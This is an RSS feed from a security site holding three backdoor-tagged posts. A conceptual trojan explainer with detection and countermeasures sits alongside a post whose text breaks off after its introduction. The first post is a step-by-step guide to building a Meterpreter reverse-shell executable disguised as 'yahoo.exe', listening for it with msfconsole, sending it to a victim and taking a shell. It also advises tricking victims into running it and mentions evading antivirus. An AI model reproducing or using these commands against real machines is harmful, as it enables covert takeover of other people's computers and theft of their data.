<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Backdoor &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/backdoor/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Wed, 01 Feb 2023 10:59:15 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>Backdoor &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Instructions to create a backdoor virus in Backtrack 5 R3</title>
		<link>https://en.anonyviet.com/instructions-to-create-a-backdoor-virus-in-backtrack-5-r3/</link>
					<comments>https://en.anonyviet.com/instructions-to-create-a-backdoor-virus-in-backtrack-5-r3/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 10:59:15 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[create]]></category>
		<category><![CDATA[Instructions]]></category>
		<category><![CDATA[virus]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7891</guid>

					<description><![CDATA[Today I will show you how to create a backdoor in Backtrack in a very simple way, without any programming knowledge, and this virus is also created by you so you don&#8217;t have to worry about becoming a backdoor. to be anyone&#8217;s victim. In this article, I only guide in Lan network, if you want [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><span style="color: #008080;"><strong>    Today I will show you how to create a backdoor in Backtrack in a very simple way, without any programming knowledge, and this virus is also created by you so you don&#8217;t have to worry about becoming a backdoor. to be anyone&#8217;s victim.  In this article, I only guide in Lan network, if you want to use it on the internet, you just need to change the host&#8217;s private IP to public IP.</strong></span></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><span style="color: #008080;"><strong>    First of all, what is a Backdoor, a backdoor is simply a virus that opens a connection port to the victim in order to get personal information on the victim&#8217;s computer or control the victim&#8217;s machine to serve the deployment of DDoS attacks to the victims. other kernel.  Once the victim has executed the virus file, you can almost take full control of the victim&#8217;s machine depending on your ability.<span id="more-442"/></strong></span></p>
<p><span style="color: #008080;"><strong>    Before starting to work, I would also like to reiterate, the article is for reference and research, destructive, not for bad purposes, so please consider before doing anything illegal.  And I will only support those of you who have knowledge but haven&#8217;t done it yet, meaningless questions like &#8220;<em>Can you hack it for me, you can only do it for me, please guide me in detail with&#8230;..bla..bla..bla&#8221; then I will not reply.</em></strong></span></p>
<p><span style="color: #008080;"><strong>Let&#8217;s get to work, first use the command<em> ifconfig</em> check the IP of the Backtrack machine, here the IP of the backtrack machine is <em>192.168.1.4</em></strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" class="alignnone size-full wp-image-3123" src="https://anonyviet.com/wp-content/uploads/2016/12/backdoor1.png" alt="BACKDOOR1" width="593" height="75" srcset="https://anonyviet.com/wp-content/uploads/2016/12/backdoor1.png 593w, https://anonyviet.com/wp-content/uploads/2016/12/backdoor1-300x38.png 300w" sizes="(max-width: 593px) 100vw, 593px" title="Instructions to create a backdoor virus in Backtrack 5 R3 13"/></strong></span></p>
<p><span style="color: #008080;"><strong>Next, use the following command to create a Backdoor with the name yahoo.exe</strong></span></p>
<p><span style="color: #008080;"><strong><em>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Desktop/yahoo.exe</em></strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3124" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-16-37_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-16-37_No-00" width="593" height="80" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-16-37_no-00.png 593w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-16-37_no-00-300x40.png 300w" sizes="auto, (max-width: 593px) 100vw, 593px" title="Instructions to create backdoor virus in Backtrack 5 R3 14"/></strong></span></p>
<p><span style="color: #008080;"><strong>Where, LHOST is the IP address of the host machine (backtrack).</strong></span></p>
<p><span style="color: #008080;"><strong>LPORT is the port we connect to the victim</strong></span></p>
<p><span style="color: #008080;"><strong>This is the yahoo.exe file that we just created</strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3125" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-19-58_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-19-58_No-00" width="593" height="337" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-19-58_no-00.png 593w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-19-58_no-00-300x170.png 300w" sizes="auto, (max-width: 593px) 100vw, 593px" title="Instructions to create a backdoor virus in Backtrack 5 R3 15"/></strong></span></p>
<p><span style="color: #008080;"><strong>Now we will turn on the listening mode to wait for the prey to fall into the trap, we run the following 2 commands to go to the framework directory to run msfconsole mode</strong></span></p>
<p><span style="color: #008080;"><strong><em>cd /pentest/exploit/framework</em></strong></span><br /><span style="color: #008080;"><strong> <em>./msfconsole</em></strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3126" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-22-37_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-22-37_No-00" width="486" height="159" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-22-37_no-00.png 486w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-22-37_no-00-300x98.png 300w" sizes="auto, (max-width: 486px) 100vw, 486px" title="Instructions for creating a backdoor virus in Backtrack 5 R3 16"/></strong></span></p>
<p><span style="color: #008080;"><strong>In msfconsole mode, we run the following commands to open the port waiting.. 🙂</strong></span></p>
<p><span style="color: #008080;"><strong><em>use exploit/multi/handler</em></strong></span><br /><span style="color: #008080;"><strong> <em>set payload windows/meterpreter/reverse_tcp</em></strong></span><br /><span style="color: #008080;"><strong> <em>set LHOST 192.168.1.4</em></strong></span><br /><span style="color: #008080;"><strong> <em>set LPORT 4444</em></strong></span><br /><span style="color: #008080;"><strong> <em>set channel 1</em></strong></span><br /><span style="color: #008080;"><strong> <em>exploit</em></strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3127" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-25-56_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-25-56_No-00" width="551" height="377" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-25-56_no-00.png 551w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-25-56_no-00-300x205.png 300w" sizes="auto, (max-width: 551px) 100vw, 551px" title="Instructions to create a backdoor virus in Backtrack 5 R3 17"/></strong></span></p>
<p><span style="color: #008080;"><strong>Now I will send that file to the victim on the xp machine</strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3128" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-33-59_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-33-59_No-00" width="593" height="433" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-33-59_no-00.png 593w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-33-59_no-00-300x219.png 300w" sizes="auto, (max-width: 593px) 100vw, 593px" title="Instructions to create a backdoor virus in Backtrack 5 R3 18"/></strong></span></p>
<p><span style="color: #008080;"><strong>After the victim runs the yahoo.exe file, on the backtrack machine, you will see that we have connected to the victim&#8217;s machine as shown in the picture.</strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3129" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-34-52_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-34-52_No-00" width="549" height="146" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-34-52_no-00.png 549w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-34-52_no-00-300x80.png 300w" sizes="auto, (max-width: 549px) 100vw, 549px" title="Instructions to create a backdoor virus in Backtrack 5 R3 19"/></strong></span></p>
<p><span style="color: #008080;"><strong>That&#8217;s it, I will use some commands to see the victim machine in DOS environment</strong></span></p>
<p><span style="color: #008080;"><strong><em>sysinfo</em> (to view victim machine information)</strong></span></p>
<p><span style="color: #008080;"><strong><em>Shell</em> (to enter the DOS environment on the victim machine)</strong></span></p>
<p><span style="color: #008080;"><strong><img decoding="async" loading="lazy" class="alignnone size-full wp-image-3130" src="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-35-56_no-00.png" alt="SnapCrab_NoName_2014-3-13_21-35-56_No-00" width="553" height="244" srcset="https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-35-56_no-00.png 553w, https://anonyviet.com/wp-content/uploads/2016/12/snapcrab_noname_2014-3-13_21-35-56_no-00-300x132.png 300w" sizes="auto, (max-width: 553px) 100vw, 553px" title="Instructions to create a backdoor virus in Backtrack 5 R3 20"/></strong></span></p>
<p><span style="color: #008080;"><strong>At this point, it looks like you have taken control of the victim&#8217;s machine, it just depends on your ability to use DOS.</strong></span><br /><span style="color: #008080;"><strong>  As for the virus, you think for yourself how to entice the victim to click, depending on your ability to cheat…^^, <em>For example, you can combine with a certain software.</em></strong></span><br /><span style="color: #008080;"><strong>  Well, note, if the victim&#8217;s computer has anti-virus software, the virus won&#8217;t work, if you want to surpass the anti-virus software, please study hard, if you have time, I will write instructions later.</strong></span></p>
<p><span style="color: #008080;"><strong>Here is my finished clip for you to imagine.</strong></span><br /><span style="color: #008080;"><strong><span class="embed-youtube"></p>
<div class="jeg_video_container jeg_video_content"><iframe title="Hướng dẫn tạo virus backdoor trong Backtrack 5 R3" width="500" height="281" src="https://www.youtube.com/embed/k00hHhh7WWQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
<p></span></strong></span></p>
<p><span style="color: #008080;"><strong>Good luck.</strong></span></p>
<p class="Image"><span style="color: #008080;"><strong> </strong></span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;449&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-to-create-a-backdoor-virus-in-backtrack-5-r3/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/2-1.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Knowledge Hacking &#8211; What is Trojan, Backdoor (Part 3)</title>
		<link>https://en.anonyviet.com/knowledge-hacking-what-is-trojan-backdoor-part-3/</link>
					<comments>https://en.anonyviet.com/knowledge-hacking-what-is-trojan-backdoor-part-3/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 08:58:25 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Knowledge]]></category>
		<category><![CDATA[Part]]></category>
		<category><![CDATA[Trojan]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7287</guid>

					<description><![CDATA[Trojans and Backdoors are two methods that hackers use to illegally infiltrate the target system. They have different states, but have one thing in common: The hacker must install another program on the target computer, or the user is tricked into installing a Trojan or Backdoor program on their computer. . Join the channel Telegram [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Trojans and Backdoors are two methods that hackers use to illegally infiltrate the target system.  They have different states, but have one thing in common: The hacker must install another program on the target computer, or the user is tricked into installing a Trojan or Backdoor program on their computer. .</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><b>1. Trojan</b><br />Trojan A type of malicious code named after the legend of &#8220;Trojan Horse&#8221;.  A Trojan is a program which contains dangerous and malicious code hidden in the form of good data but the program appears to be innocuous as far as this feature it can control and cause harm, for example opening a distribute files in your hard disk.</p>
<p><b>2. Backdoors</b><br />A backdoor is a program (program) or related to a program, used by a hacker to install on the target system, in order to give him back access to the system at a later time.  The purpose of the backdoor is to verifiably remove the logging system.  It also helps hackers to stay in access status when detected by the administrator and find a way to fix it.</p>
<p><b>3. The purpose of the trojan</b><br />• Steal information such as passwords, credit card security code information using keylogers<br />• Using the victim&#8217;s computer to create a botnet (ghost computer network) to perform DDOS attacks<br />• Delete or replace important system files<br />• Create a fake connection to attack DOS<br />• Download Spyware Adwares and Malicious Files<br />• Disable firewalls and anti-virus software<br />• Screen capture, audio recording, screen recording of the victim&#8217;s device<br />• infect the victim&#8217;s PC as a proxy server for relay attacks<br />• Using the victim&#8217;s computer to spread spam and mail bombs</p>
<p><b>4. Recognizing a Trojan Attack</b></p>
<div>
<p>• CD-ROM drive opens and closes by it</p>
<p>• Your computer&#8217;s browser redirects to unknown pages</p>
<p>• Anti-Virus is disabled or its properties are not active.</p>
<p>• Taskbar disappears</p>
<p>• The chat dialog is appearing on the victim&#8217;s computer</p>
<p>• The color setting window is changed</p>
<p>• Windows Start button disappears</p>
<p>• Account and password changed or not authenticated</p>
<p>• Computer screen turns upside down or upside down</p>
<p>• The settings of the idle screen change automatically</p>
<p>• The service provider complains that the victim is scanning his ip</p>
<p>• Unusual purchase reports appear on your credit card</p>
<p>• Wallpaper and background change</p>
<p>• Functions of left and right buttons are reversed</p>
<p>• People know a lot of information about the victim</p>
<p>• The computer screen is turned off by it</p>
<p>• Document or message printed from your printer</p>
<p>• Mouse pointer disappears or moves by it</p>
<p>• The computer is turned off or turned on by it</p>
<p>• Shortcut Ctrl+Alt+Del stops working</p>
</div>
<p><b>5. Ports used by popular trojans</b></p>
<div class="separator"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F03%2Fnetstat.png" rel="attachment wp-att-1785 noopener"><br /></a> <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F03%2Fpl-trojan.png" rel="attachment wp-att-1786 noopener"><br /></a> <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F03%2Fport.png" rel="attachment wp-att-1787 noopener" class="local-link"><img post-id="7287" fifu-featured="1" fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-1787" src="https://anonyviet.com/wp-content/uploads/2016/03/port.png" alt="Knowledge Hacking &#8211; What is Trojan, Backdoor (Part 3)" title="Knowledge Hacking &#8211; What is Trojan, Backdoor (Part 3)" width="514" height="379" srcset="https://anonyviet.com/wp-content/uploads/2016/03/port.png 514w, https://anonyviet.com/wp-content/uploads/2016/03/port-300x221.png 300w" sizes="(max-width: 514px) 100vw, 514px" title="Knowledge Hacking - What is Trojan, Backdoor (Part 3) 9"/></a></div>
<p>How to use netstat -an command in CMD mode to see the status of ports?</p>
<div class="separator"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1785" src="https://anonyviet.com/wp-content/uploads/2016/03/netstat.png" alt="netstat" width="676" height="345" srcset="https://anonyviet.com/wp-content/uploads/2016/03/netstat.png 676w, https://anonyviet.com/wp-content/uploads/2016/03/netstat-300x153.png 300w" sizes="auto, (max-width: 676px) 100vw, 676px" title="Knowledge Hacking - What is Trojan, Backdoor (Part 3) 10"/></div>
<p><b>6. How are Trojans deployed?</b></p>
<div>
<p>• Create a new Trojan using Trojan house Construction Kit</p>
<p>• Creates a Trojan, part of a Trojanized package that installs malicious code on the target system</p>
<p>• Create a wrapper to install on the victim&#8217;s computer</p>
<p>• Dissemination of Trojans</p>
<p>• Implement droppers</p>
<p>• Regular enforcement of termites</p>
</div>
<div><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1788" src="https://anonyviet.com/wp-content/uploads/2016/03/tk-trojan.png" alt="tk-trojan" width="508" height="204" srcset="https://anonyviet.com/wp-content/uploads/2016/03/tk-trojan.png 508w, https://anonyviet.com/wp-content/uploads/2016/03/tk-trojan-300x120.png 300w" sizes="auto, (max-width: 508px) 100vw, 508px" title="Knowledge Hacking - What is Trojan, Backdoor (Part 3) 11"/></div>
<p><b>7. How does the Trojan infect?</b></p>
<div>
<p>• Legalize an illegal package in packaged software</p>
<p>• Fake program</p>
<p>• Download files, games and screensavers from sites on the internet</p>
<p>• Untrusted freeware sites</p>
<p>• NetBIOS (Share files)</p>
<p>• Instant messaging app</p>
<p>• IRC(Internet Relay Chat)</p>
<p>• Attachments</p>
<p>• Physical access</p>
<p>• Errors in browser and mail software</p>
</div>
<p><b>8. Classification of trojans</b></p>
<div class="separator"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1786" src="https://anonyviet.com/wp-content/uploads/2016/03/pl-trojan.png" alt="pl-trojan" width="572" height="367" srcset="https://anonyviet.com/wp-content/uploads/2016/03/pl-trojan.png 572w, https://anonyviet.com/wp-content/uploads/2016/03/pl-trojan-300x192.png 300w" sizes="auto, (max-width: 572px) 100vw, 572px" title="Knowledge Hacking - What is Trojan, Backdoor (Part 3) 12"/></div>
<p><i><b>a.  Command shell Trojan</b></i></p>
<p>• The Trojan Shell command allows remote control of the shell command on the victim&#8217;s computer</p>
<p>• The Trojan server is installed on the victim&#8217;s machine, in which it opens a port for the Attacker to connect to.</p>
<p>A workstation is on the Attacker&#8217;s machine, where it is used to run shell commands on the victim&#8217;s computer</p>
<p><b><i>b.  Email Trojans </i></b></p>
<p>• Attacker remotely controls the victim&#8217;s computer by sending an email</p>
<p>• Attacker can get files or folders by sending commands via email</p>
<p>• Attacker opens SMTP relay server and spoofs email from a field to hide the origin</p>
<p><b><i>c.  Botnet Trojans </i></b></p>
<p>• The botnet Trojan infects a large number of computers over a large geographical area, creating a network of bots controlled through a central Command and Control (C&#038;C)</p>
<p>• Botnets are used to launch a variety of attacks on a victim including denial of service attacks, spamming, click fraud and financial information theft</p>
<p><b><i>d.  Proxy server Trojans</i></b></p>
<p>• Trojan Proxy is commonly used as an application that allows a remote attacker to use the victim&#8217;s computer as a proxy to connect to the Internet.</p>
<p>• Proxy server Trojan, when infected, starts hiding a Proxy server on the victim&#8217;s computer</p>
<p>• Thousands of computers on the Internet are infected with Proxy servers using this technique</p>
<p><b><i>e.  FTP Trojans</i></b></p>
<p>• FTP Trojans install FTP server on victim machine, it opens FTP port</p>
<p>• Attacker can connect to the victim&#8217;s machine using the FTP port to download any file that exists on the victim&#8217;s computer.</p>
<p><b><i>f.  VNC Trojans </i></b></p>
<p>The VNC Trojan starts a VNC Server daemon on the infected system.  It connects to the victim using any VNC viewer with the password “secret”.  When the VNC program is scrutinized, the Trojan will never be detected by the anti-virus.</p>
<p><b><i>g.  HTTP/HTTPS Trojans</i></b></p>
<p>• HTTP Trojan can bypass any firewall and work under the reverse of an HTTP tunnel</p>
<p>• They are executed on the local host and then self-replicate in a pre-calculated cycle</p>
<p>• Subroutine appears to the firewall user thus allowing Internet access</p>
<p><b><i>H.  Remote Access Trojan</i></b></p>
<p>The Trojan works like accessing Remote Desktop.  Hacker takes over all GUI to access remote system</p>
<p>• Infects computer(Rebecca&#8217;s) with server.exe and back-connecting Trojan</p>
<p>• Trojan connects to port 80 so that the Russian attacker establishes a reverse connection</p>
<p>• Jason, the attacker, has full control of Rebecca&#8217;s machine</p>
<p><b><i>i.  .  E-banking Trojans</i></b></p>
<p>E-Banking Trojan Intercepts the victim&#8217;s account information before it is encrypted and sends Trojan commands to the attacker&#8217;s control center.</p>
<p><b><i>k.  Destructive Trojans </i></b></p>
<p>• This is a dangerous and destructive type of Trojans</p>
<p>• When executed this Trojans destroy the operating system</p>
<p>• Trojans format all local and network drives</p>
<p>• User will not be able to boot the operating system</p>
<p><b><i>l.  Encryption Trojans </i></b></p>
<p>• Encryption Trojan: encrypts data files in the victim&#8217;s system and makes the information unusable</p>
<p>• Attackers ask for a ransom or manpower to make purchases from their online drug stores in return for the password to unlock</p>
<p><b>9. Detect trojans</b></p>
<div>
<p>• Run Trojan scanner to detect Trojan</p>
<p>• Scan for suspicious NETWORK ACTIVITIES</p>
<p>• Scan for suspicious changes to OS FILES</p>
<p>• Scan for suspicious STARTUP PROGRAMS</p>
<p>• Scan for Suspicious FILES AND Folders</p>
<p>• Scan for suspicious DEVICE DRIVERS installed on the computer</p>
<p>• Scan for suspicious WINDOWN SERVICES</p>
<p>• Scan for suspicious REGISTRY ITEM</p>
<p>• Scan for suspicious OPEN PORTS</p>
<p>• Scan for suspicious RUN PROCESSES</p>
</div>
<p><b>10. Countermeasures against Trojan</b></p>
<p><span lang="FR"> • Avoid downloading and executing applications from untrusted sources</span></p>
<p><span lang="FR">• Avoid opening email attachments received from unknown senders</span></p>
<p>• Install patches and security updates for operating systems and applications</p>
<p>• Scan CDs and floppy disks with anti-virus software before use</p>
<p>• Avoid accepting instant messaging schemes</p>
<p>• Block all unnecessary ports at servers and firewalls</p>
<p>• When hardware is weak, Set default configuration</p>
<p>• Disable unused functions including protocols and services</p>
<p>• Avoid typing commands blindly and execute pre-made programs or scripts</p>
<p>• Monitor intranet traffic for odd ports or encrypt traffic</p>
<p>• Workstation local file integrity management through checksums, audits, and port scans</p>
<p>• Run versions of anti-virus, firewall, and intrusion detection software</p>
<p>• Restrict access in the desktop environment to prevent malicious applications from installingat on</p>
<p><b>11. Countermeasures against backdoors</b></p>
<div>
<p>• Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage</p>
<p>• Prevent users from installing apps downloaded from untrusted Internet sites and email attachments</p>
<p>• Use anti-virus tools such as Windows Defender, McAfee, Norton to detect and remove backdoors</p>
<p>\</p>
</div>
<p><b>12. Penetration testing</b></p>
<div>
<p>• Scan system for open ports, running processes, registry keys, device drivers and services If any suspicious ports, processes, registry entries, device drivers or services are detected , check the related executables</p>
<p>• Gather more information about the word from the publisher&#8217;s website, if available, and the Internet Check if open ports are known to be opened by Trojans in the wild</p>
<p>• Check startup programs and determine if all programs in the list can be recognized with known functions</p>
<p>• Check data files for modification or manipulation by opening several files and comparing the hash value of these files with a precomputed hash</p>
<p>• Check for suspicious network activity such as bulk file uploads or unusually high traffic going to a specific web address</p>
<p>• Check for important OS file modifications or manipulations using tools like tripwire or compare hashes yourself if you have a backup</p>
<p>• Run an updated Trojan scanner from a reputable vendor to identify Trojans in the wild.</p>
<p>• Text all findings in previous steps, it helps in determining next action if Trojans are identified in the system</p>
<p>• Isolate the infected system from the network immediately to prevent further infection</p>
<p>• Complete system disinfection for Trojans using anti-virus updates</p>
</div>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1784&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/knowledge-hacking-what-is-trojan-backdoor-part-3/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/03/port.png" medium="image"></media:content>
            	</item>
		<item>
		<title>How to create a simple Backdoor with CMD</title>
		<link>https://en.anonyviet.com/how-to-create-a-simple-backdoor-with-cmd/</link>
					<comments>https://en.anonyviet.com/how-to-create-a-simple-backdoor-with-cmd/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 06 Jan 2023 01:10:26 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[CMD]]></category>
		<category><![CDATA[create]]></category>
		<category><![CDATA[simple]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=604</guid>

					<description><![CDATA[As we all know, in the cybersecurity industry, Backdoor is a malicious software that bypasses the authentication in a certain system, gaining unauthorized access. Not only that, hackers also use it to steal data, attack networks, etc. And today, I will guide you to create a simple Backdoor with just a simple Batch script. For [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>As we all know, in the cybersecurity industry, Backdoor is a malicious software that bypasses the authentication in a certain system, gaining unauthorized access.  Not only that, hackers also use it to steal data, attack networks, etc. And today, I will guide you to create a simple Backdoor with just a simple Batch script.  For those of you who do not know about Backdoor, please read <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F1784-2%2F" class="local-link" rel="noopener">this paragraph</a> or you can find out <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwiki.matbao.net%2Fbackdoor-la-gi-cach-hoat-dong-va-phong-tranh-backdoor%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.  Alright, let&#8217;s get to the point</p>
<p><span style="color: #ff0000;"><strong>Note: This article is for educational purposes only.  Any illegal acts Anonyviet will not bear the full responsibility that you have caused</strong></span></p>
